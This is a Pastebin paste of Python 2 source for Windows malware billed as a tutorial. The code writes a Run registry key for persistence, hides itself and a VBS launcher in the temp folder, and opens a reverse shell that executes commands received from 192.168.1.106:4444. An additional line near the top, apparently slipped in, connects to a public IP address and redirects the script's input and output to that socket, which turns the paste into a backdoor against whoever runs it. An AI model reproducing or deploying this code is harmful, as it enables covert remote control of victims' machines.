SHARE
TWEET

Untitled

a guest Oct 15th, 2019 77 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # HACKING WITH PYTHON
  2. # Simple malware for back connect in python for windows ;)
  3.  
  4. # Autor: anarc0der  
  5.  
  6. import os
  7. import subprocess
  8. import socket
  9. import sys
  10. import tempfile
  11. from _winreg import *
  12.  
  13. MALWARE_NAME = "malware.exe"
  14. TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"
  15. KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"
  16. KEY_NAME = "anarc0der_key"
  17. REV_SHELL = "192.168.1.106"
  18. SHELL_PORT = 4444
  19. TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER
  20. MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME
  21. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.19.114.185",12568));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
  22. print "[+] Loading Script, please wait..."
  23.  
  24. class My_malware():
  25.  
  26.     def infect_windows_register_keys(self):
  27.         """ Method to register malware on windows keys.
  28.             Returns False if didnt have key for malware.
  29.             Returns True if already have key for malware. """
  30.         key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
  31.         keys = []
  32.         try:
  33.             i=0
  34.             while True:
  35.                 cur_key = EnumValue(key, i)
  36.                 keys.append(cur_key[0])
  37.                 i+=1
  38.         except:
  39.             pass
  40.         if KEY_NAME not in keys:
  41.             mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
  42.             SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
  43.             mlwr_key.Close()
  44.             return False
  45.         return True
  46.  
  47.     def hide_malware_and_trigger(self):
  48.         """ Method to generate & hide the trigger and malware.
  49.             Return True if was alredy hided.
  50.             Return False if wasnt hided """
  51.         if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
  52.             return True
  53.         else:
  54.             payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
  55.             with open(TRIGGER_PATH, 'w') as f:
  56.                 f.write(payload)
  57.             os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))
  58.             return False
  59.  
  60.     def reverse_shell_function(self):
  61.         """ Method of reverse shell in python """
  62.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63.         s.connect((REV_SHELL,SHELL_PORT))
  64.         s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
  65.         while True:
  66.             data = s.recv(1024)
  67.             if "quit" in data:
  68.                 break
  69.             cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  70.             saida_cmd = cmd.stdout.read() + cmd.stderr.read()
  71.             s.send(saida_cmd)
  72.             s.send("Comando: ")
  73.         s.close()
  74.  
  75. def main():
  76.     my_returns = []
  77.     x = My_malware()
  78.     my_returns.append(x.infect_windows_register_keys())
  79.     my_returns.append(x.hide_malware_and_trigger())
  80.     if all(res is True for res in my_returns):
  81.         x.reverse_shell_function()
  82.  
  83. if __name__ == '__main__':
  84.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top